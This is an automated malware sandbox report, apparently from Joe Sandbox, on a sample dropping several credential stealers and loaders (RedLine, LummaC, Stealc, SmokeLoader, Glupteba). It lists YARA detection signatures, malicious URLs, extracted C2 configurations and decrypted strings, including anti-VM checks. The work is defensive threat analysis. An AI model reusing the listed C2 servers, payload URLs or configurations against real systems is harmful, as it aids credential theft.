00000022.00000003.2606999840.00000162B3938000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000022.00000003.2635361488.00000162B3938000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000022.00000003.2605648094.00000162B3938000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000022.00000003.2739604145.00000162B3938000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000022.00000003.2637330287.00000162B3938000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000023.00000002.2865187814.0000000003443000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000023.00000002.2865187814.0000000003443000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000022.00000003.2739194931.00000162B3938000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000022.00000003.2685151300.00000162B3938000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000004.00000002.1911380987.0000000004BBE000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000022.00000003.2638553734.00000162B3938000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000029.00000002.2775428464.0000000002B14000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000022.00000003.2602553062.00000162B3938000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000022.00000003.2644099258.00000162B3938000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000022.00000003.2627137075.00000162B3938000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000022.00000003.2605031090.00000162B3938000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000011.00000002.2145323149.0000000001F61000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000011.00000002.2145323149.0000000001F61000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x2f4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000022.00000003.2577695503.00000162B3938000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
0000000E.00000002.2067327627.00000000006BC000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x1410:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000022.00000003.2673068563.00000162B3938000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000022.00000003.2594779782.00000162B3938000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000000.00000002.1676415097.00000000001F0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000000.00000002.1676415097.00000000001F0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x5e4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000022.00000003.2731190444.00000162B3938000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000022.00000003.2722127729.00000162B3938000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000022.00000003.2644959111.00000162B3938000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
0000001F.00000002.3074108822.00000000009FC000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x4a90:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000022.00000003.2608660423.00000162B3938000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000029.00000002.2775428464.0000000002A34000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000029.00000002.2775428464.0000000002A34000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000022.00000003.2726975550.00000162B3938000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000022.00000003.2206636387.00000162B0C70000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
0000001F.00000003.2202387362.00000000009B0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000022.00000003.2562339585.00000162B3938000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000022.00000003.2232045068.00000162B33C0000.00000004.00000001.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000022.00000003.2598333639.00000162B3938000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
0000001F.00000002.3074464547.0000000000A46000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000022.00000003.2607875870.00000162B3938000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
0000001F.00000002.3071615615.00000000008B0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0000001F.00000002.3071615615.00000000008B0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000022.00000003.2632610681.00000162B3938000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000003.00000002.1919452397.00000000020A1000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000003.00000002.1919452397.00000000020A1000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x1e4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
0000000F.00000002.2567693218.0000000000843000.00000040.00000001.01000000.0000000D.sdmp	JoeSecurity_Glupteba	Yara detected Glupteba	Joe Security
00000022.00000003.2700525376.00000162B3938000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000004.00000002.1911380987.00000000043B9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000022.00000003.2730383751.00000162B3938000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000022.00000003.2563346057.00000162B3938000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000022.00000003.2576231333.00000162B3938000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000022.00000003.2712495323.00000162B3938000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000022.00000003.2712931577.00000162B3938000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000022.00000003.2736607710.00000162B3938000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000022.00000003.2643465060.00000162B3938000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000022.00000003.2744176853.00000162B3938000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
0000000F.00000002.2724435477.0000000002E90000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
Process Memory Space: 4854.exe PID: 7792	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: RegSvcs.exe PID: 7932	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: 31839b57a4f11171d6abc8bbc4451ee4.exe PID: 7216	JoeSecurity_Glupteba	Yara detected Glupteba	Joe Security
Process Memory Space: RegAsm.exe PID: 2992	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 2992	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Process Memory Space: 928F.exe PID: 5408	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: 9E77.exe PID: 4048	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: 9E77.exe PID: 4048	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Process Memory Space: 9E77.exe PID: 4048	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Process Memory Space: nsa984B.tmp.exe PID: 7684	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: nsa984B.tmp.exe PID: 7684	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: nsa984B.tmp.exe PID: 7684	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: RegSvcs.exe PID: 3260	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Process Memory Space: dialer.exe PID: 7056	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Click to see the 125 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.uVQLD8YVk6.exe.400000.0.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
30.3.9E77.exe.25a0000.0.raw.unpack	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
4.2.4854.exe.4acd9b0.2.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
17.2.toolspub2.exe.400000.0.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
4.2.4854.exe.43f07f0.9.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
4.2.4854.exe.4acd9b0.2.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
3.2.srvwauv.400000.0.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
14.2.toolspub2.exe.5c15a0.1.raw.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
41.0.33A6.exe.790000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
31.2.nsa984B.tmp.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
31.2.nsa984B.tmp.exe.400000.0.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
35.2.CFAA.exe.2f0000.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
35.2.CFAA.exe.2f0000.0.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x2bee9:$s1: file:/// 0x2be45:$s2: {11111-22222-10009-11112} 0x2be79:$s3: {11111-22222-50001-00000} 0x29506:$s4: get_Module 0x26e9d:$s5: Reverse 0x2aeab:$s6: BlockCopy 0x2ae4c:$s7: ReadByte 0x2befb:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
0.0.uVQLD8YVk6.exe.400000.0.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
31.2.nsa984B.tmp.exe.8b0e67.1.raw.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
34.3.dialer.exe.162b33c0000.5.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
3.0.srvwauv.400000.0.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
4.0.4854.exe.aa0000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
4.0.4854.exe.aa0000.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
4.0.4854.exe.aa0000.0.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x2779ef:$s1: file:/// 0x2778ff:$s2: {11111-22222-10009-11112} 0x27797f:$s3: {11111-22222-50001-00000} 0x24d559:$s4: get_Module 0x231e1b:$s5: Reverse 0x25d09a:$s6: BlockCopy 0x24b1bb:$s7: ReadByte 0x277a01:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
31.3.nsa984B.tmp.exe.9b0000.0.raw.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
4.2.4854.exe.43f07f0.9.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
8.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
31.2.nsa984B.tmp.exe.400000.0.raw.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
34.3.dialer.exe.162b30e0000.4.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
34.3.dialer.exe.162b30e0000.4.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
31.2.nsa984B.tmp.exe.8b0e67.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
31.2.nsa984B.tmp.exe.8b0e67.1.unpack	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x14e829:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
15.3.31839b57a4f11171d6abc8bbc4451ee4.exe.3780000.1.unpack	JoeSecurity_Glupteba	Yara detected Glupteba	Joe Security
15.2.31839b57a4f11171d6abc8bbc4451ee4.exe.400000.1.unpack	JoeSecurity_Glupteba	Yara detected Glupteba	Joe Security
16.0.BroomSetup.exe.400000.0.unpack	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
15.2.31839b57a4f11171d6abc8bbc4451ee4.exe.2e90e67.8.unpack	JoeSecurity_Glupteba	Yara detected Glupteba	Joe Security
Click to see the 27 entries

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: uVQLD8YVk6.exe

Avira: detected

Antivirus detection for URL or domain

Source: politefrightenpowoa.pw	URL Reputation: Label: malware
Source: http://192.186.7.211:2001/	Avira URL Cloud: Label: malware
Source: http://5.42.64.35/-core-win32k-fulluser-l1-1-0	Avira URL Cloud: Label: malware
Source: http://soupinterestoe.fun/p	Avira URL Cloud: Label: malware
Source: http://soupinterestoe.fun/pir$	Avira URL Cloud: Label: malware
Source: http://soupinterestoe.fun/	Avira URL Cloud: Label: malware
Source: http://soupinterestoe.fun/et-Coo	Avira URL Cloud: Label: malware
Source: http://soupinterestoe.fun/apih	Avira URL Cloud: Label: malware
Source: http://soupinterestoe.fun/apim	Avira URL Cloud: Label: malware
Source: http://soupinterestoe.fun/apiz	Avira URL Cloud: Label: malware
Source: http://soupinterestoe.fun/;v	Avira URL Cloud: Label: malware
Source: http://soupinterestoe.fun:80/api	Avira URL Cloud: Label: malware
Source: http://soupinterestoe.fun/kw	Avira URL Cloud: Label: malware
Source: http://soupinterestoe.fun/apiE	Avira URL Cloud: Label: malware
Source: http://soupinterestoe.fun/bohj;	Avira URL Cloud: Label: malware
Source: http://soupinterestoe.fun/obth;	Avira URL Cloud: Label: malware
Source: http://5.42.66.58/f059ec3d7eb90876/vcruntime140.dll	Avira URL Cloud: Label: malware
Source: http://soupinterestoe.fun/oe.	Avira URL Cloud: Label: malware
Source: http://5.42.66.58/f059ec3d7eb90876/softokn3.dll;	Avira URL Cloud: Label: malware
Source: http://soupinterestoe.fun/upi	Avira URL Cloud: Label: malware
Source: http://5.42.64.35/syncUpd.exeSystem32	Avira URL Cloud: Label: malware
Source: http://5.42.66.58/f059ec3d7eb90876/softokn3.dll	Avira URL Cloud: Label: malware
Source: http://5.42.66.58/f059ec3d7eb90876/freebl3.dll	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000004.00000002.1911380987.0000000004ACA000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: RedLine {"C2 url": "195.20.16.103:18305", "Bot Id": "666", "Authorization Header": "6a285b1c7a795c394e7d6aadc56f52aa"}
Source: 0000001F.00000002.3077167175.0000000002435000.00000004.00000020.00020000.00000000.sdmp	Malware Configuration Extractor: StealC {"C2 url": "http://5.42.66.58/3886d2276f6914c4.php"}
Source: 00000003.00000002.1918764869.0000000002080000.00000004.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://185.215.113.68/fks/index.php", "http://185.215.113.68/fks/index.php"]}
Source: 30.3.9E77.exe.25a0000.0.raw.unpack	Malware Configuration Extractor: LummaC {"C2 url": ["soupinterestoe.fund", "dayfarrichjwclik.fun", "neighborhoodfeelsa.fun", "ratefacilityframw.fun", "reviveincapablewew.pw", "cakecoldsplurgrewe.pw", "opposesicknessopw.pw", "politefrightenpowoa.pw"]}

Multi AV Scanner detection for domain / URL

Source: soupinterestoe.fun	Virustotal: Detection: 19%	Perma Link
Source: chincenterblandwka.pw	Virustotal: Detection: 7%	Perma Link
Source: host-host-file8.com	Virustotal: Detection: 19%	Perma Link
Source: host-file-host6.com	Virustotal: Detection: 19%	Perma Link
Source: http://192.186.7.211:2001/	Virustotal: Detection: 5%	Perma Link
Source: http://soupinterestoe.fun/	Virustotal: Detection: 19%	Perma Link
Source: http://soupinterestoe.fun/p	Virustotal: Detection: 19%	Perma Link
Source: http://soupinterestoe.fun/apim	Virustotal: Detection: 15%	Perma Link
Source: http://soupinterestoe.fun:80/api	Virustotal: Detection: 23%	Perma Link
Source: http://5.42.66.58/	Virustotal: Detection: 14%	Perma Link

Multi AV Scanner detection for submitted file

Source: uVQLD8YVk6.exe	ReversingLabs: Detection: 81%
Source: uVQLD8YVk6.exe	Virustotal: Detection: 86%			Perma Link

Yara detected Glupteba

Source: Yara match	File source: 15.3.31839b57a4f11171d6abc8bbc4451ee4.exe.3780000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.31839b57a4f11171d6abc8bbc4451ee4.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.31839b57a4f11171d6abc8bbc4451ee4.exe.2e90e67.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000F.00000003.2066199382.0000000003BC2000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2724435477.00000000032D3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2567693218.0000000000843000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 31839b57a4f11171d6abc8bbc4451ee4.exe PID: 7216, type: MEMORYSTR

Machine Learning detection for sample

Source: uVQLD8YVk6.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: GetProcAddress
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: LoadLibraryA
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: lstrcatA
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: OpenEventA
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: CreateEventA
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: CloseHandle
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: Sleep
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: GetUserDefaultLangID
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: VirtualAllocExNuma
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: VirtualFree
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: GetSystemInfo
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: VirtualAlloc
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: HeapAlloc
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: GetComputerNameA
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: lstrcpyA
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: GetProcessHeap
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: GetCurrentProcess
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: lstrlenA
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: ExitProcess
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: GlobalMemoryStatusEx
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: GetSystemTime
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: SystemTimeToFileTime
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: advapi32.dll
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: gdi32.dll
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: user32.dll
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: crypt32.dll
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: ntdll.dll
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: GetUserNameA
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: CreateDCA
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: GetDeviceCaps
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: ReleaseDC
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: CryptStringToBinaryA
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: sscanf
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: VMwareVMware
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: HAL9TH
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: JohnDoe
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: DISPLAY
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: default4
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: GetEnvironmentVariableA
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: GetFileAttributesA
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: GlobalLock
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: HeapFree
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: GetFileSize
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: GlobalSize
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: CreateToolhelp32Snapshot
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: IsWow64Process
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: Process32Next
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: GetLocalTime
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: FreeLibrary
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: GetTimeZoneInformation
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: GetSystemPowerStatus
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: GetVolumeInformationA
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: GetWindowsDirectoryA
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: Process32First
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: GetLocaleInfoA
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: GetUserDefaultLocaleName
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: GetModuleFileNameA
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: DeleteFileA
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: FindNextFileA
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: LocalFree
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: FindClose
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: SetEnvironmentVariableA
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: LocalAlloc
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: GetFileSizeEx
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: ReadFile
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: SetFilePointer
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: WriteFile
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: CreateFileA
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: FindFirstFileA
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: CopyFileA
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: VirtualProtect
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: GetLogicalProcessorInformationEx
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: GetLastError
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: lstrcpynA
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: MultiByteToWideChar
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: GlobalFree
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: WideCharToMultiByte
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: GlobalAlloc
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: OpenProcess
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: TerminateProcess
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: GetCurrentProcessId
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: gdiplus.dll
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: ole32.dll
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: bcrypt.dll
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: wininet.dll
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: shlwapi.dll
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: shell32.dll
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: psapi.dll
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: rstrtmgr.dll
Source: 31.2.nsa984B.tmp.exe.400000.0.unpack	String decryptor: CreateCompatibleBitmap
